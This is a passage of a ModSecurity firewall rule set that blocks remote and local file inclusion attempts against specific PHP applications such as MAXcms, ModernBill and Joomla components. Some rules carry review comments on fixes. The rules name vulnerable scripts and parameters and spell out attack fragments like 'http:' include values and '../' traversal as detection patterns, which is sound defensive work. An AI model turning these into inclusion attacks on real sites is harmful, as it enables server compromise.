"@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /com_ongumatimesheet20/lib/onguma.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009391,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6976/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Onguma Time Sheet Component onguma.class.php mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010475) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KR-Web krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /adm/krgourl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010475,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS KR-Web krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/krweb-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
&TX:'/RFI.*ARGS:DOCUMENT_ROOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KR-Web krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010197) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KingCMS menu.php CONFIG Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /include/engine/content/elements/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010197,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS KingCMS menu.php CONFIG Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CONFIG[AdminPath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KingCMS menu.php CONFIG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009761) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /include/unverified.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009761,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5179/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003716) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LaVague Remote Inclusion Attempt -- printbar.php views_path SecRule REQUEST_LINE "@contains /views/print/printbar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003716,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS LaVague Remote Inclusion Attempt -- printbar.php views_path',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3870/'" SecRule &TX:'/RFI.*ARGS:views_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LaVague Remote Inclusion Attempt -- printbar.php views_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /locms/smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010023,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9015/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:cwd "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010024) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /locms/smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010024,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Remote File 
Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9015/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cwd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011000) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Worksystems linkbar.php cfile Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /smallaxe-0.3.1/inc/linkbar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011000,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Worksystems linkbar.php cfile Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10676'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cfile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Worksystems linkbar.php cfile Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008897) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Remote File Inclusion SecRule REQUEST_LINE "@contains /snippet.reflect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008897,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7204/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:reflect_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Remote File 
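Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion
# Chain: request line names snippet.reflect.php, contains "GET ", and the reflect_base
# argument carries a "../" sequence. The last link used to test the RFI marker
# (&TX:'/RFI.*ARGS:reflect_base/'), which made this rule a copy of the Remote File
# Inclusion rule for the same parameter and left traversal values undetected; it now
# follows the ARGS:<param> "@contains ../" form of the other Local File Inclusion rules
# in this file (e.g. 2010023).
# NOTE(review): the "GET " link means requests using other methods do not match this chain.
SecRule REQUEST_LINE "@contains /snippet.reflect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008898,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7204/'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:reflect_base "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor getid3.php Remote File Inclusion Attempt
# The TX selector is a regular expression, so the brackets of the parameter name
# determined_format[include] are escaped. Unescaped, "[include]" is a character class
# and the selector cannot match a TX name ending in the literal parameter name, so the
# "@gt 0" count would stay at 0 and the rule would never fire.
# NOTE(review): relies on the generic RFI rule storing %{matched_var_name} in the TX
# variable name, as the setvar actions in this file do; confirm against the base rules.
SecRule REQUEST_LINE "@contains /velid3/getid3.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011062,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor getid3.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:determined_format\[include\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor getid3.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011063) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor module.archive.gzip.php Remote File Inclusion Attempt
# Same bracket escaping as rule 2011062: the selector must match the literal
# parameter name determined_format[include].
SecRule REQUEST_LINE "@contains /velid3/module.archive.gzip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011063,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor module.archive.gzip.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:determined_format\[include\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mp3 Online Id Tag Editor module.archive.gzip.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010223) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion Attempt
# Two-link chain with no method test: the request line names Cache/Lite/Output.php and
# a TX variable matching RFI.*ARGS:mosConfig_absolute_path exists.
SecRule REQUEST_LINE "@contains /includes/Cache/Lite/Output.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010223,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/29716/info'"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011259) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /includes/file_manager/special.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011259,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File 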
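Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9350/'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:fm_includes_special/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# MAXcms RFI attempt rules (1)-(4): each is a single, unchained SecRule doing a literal
# substring test on the transformed request line.
# The operands previously ended in "http|3a|". "|3a|" is IDS-style hex notation for ":"
# that @contains does not interpret, so the rules looked for the literal characters
# "|3a|" and did not match a value beginning with "http:". The operands now end in
# "http:".
# NOTE(review): t:normalisePathWin is applied before matching, so the operand stops at
# the colon and does not include the slashes of the scheme separator.

# (2009888) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (1)
SecRule REQUEST_LINE "@contains /includes/InstantSite/inc.is_root.php?is_projectPath=http:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009888,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (1) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (1) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009889) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (2)
SecRule REQUEST_LINE "@contains /classes/class.Tree.php?GLOBALS[thCMS_root]=http:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009889,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (2) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (2) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009890) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (3)
SecRule REQUEST_LINE "@contains /classes/class.thcsm_user.php?is_path=http:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009890,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (3) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (3) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009891) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (4)
SecRule REQUEST_LINE "@contains /modul/mod.users.php?thCMS_root=http:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009891,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms RFI attempt (4) ',tag:'web-application-attack',tag:'url,www.sans.org/top20/',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms RFI attempt (4) ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003331) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Generic membreManager.php remote file include
# Two-link chain: the request line names membreManager.php, and the query string or
# request body holds include_path= followed by an ftp(s), http(s) or php scheme.
SecRule REQUEST_LINE "@contains /membres/membreManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003331,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Generic membreManager.php remote file include',tag:'web-application-attack',tag:'bugtraq,22287'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:include_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Generic membreManager.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009141) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MiNBank utdb_access.php minsoft_path Parameter Remote File Inclusion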
SecRule REQUEST_LINE "@contains /utdb_access.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009141,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MiNBank utdb_access.php minsoft_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31492'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:minsoft_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MiNBank utdb_access.php minsoft_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009142) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MiNBank utgn_message.php minsoft_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /utgn_message.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009142,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MiNBank utgn_message.php minsoft_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31492'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:minsoft_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MiNBank utgn_message.php minsoft_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003717) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS miplex2 Remote Inclusion SmartyFU.class.php system SecRule REQUEST_LINE "@contains /lib/smarty/SmartyFU.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003717,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS miplex2 Remote Inclusion SmartyFU.class.php system',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3878'" 
SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS miplex2 Remote Inclusion SmartyFU.class.php system',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008900) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill export_batch.inc.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /export_batch.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008900,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill export_batch.inc.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill export_batch.inc.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008901) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill run_auto_suspend.cron.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /run_auto_suspend.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008901,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill run_auto_suspend.cron.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill run_auto_suspend.cron.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008902) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill send_email_cache.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /send_email_cache.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008902,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill send_email_cache.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill send_email_cache.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008903) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill 2checkout_return.inc.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /2checkout_return.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008903,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill 2checkout_return.inc.php DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill 2checkout_return.inc.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ModernBill nettools.popup.php DIR Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /nettools.popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008904,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ModernBill nettools.popup.php 
DIR Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ModernBill nettools.popup.php DIR Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009437,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dirn "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009430,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008938) SpiderLabs Research (SLR) 
Public Vulns: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion SecRule REQUEST_LINE "@contains /include/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pfad/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009330) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /centre.php" 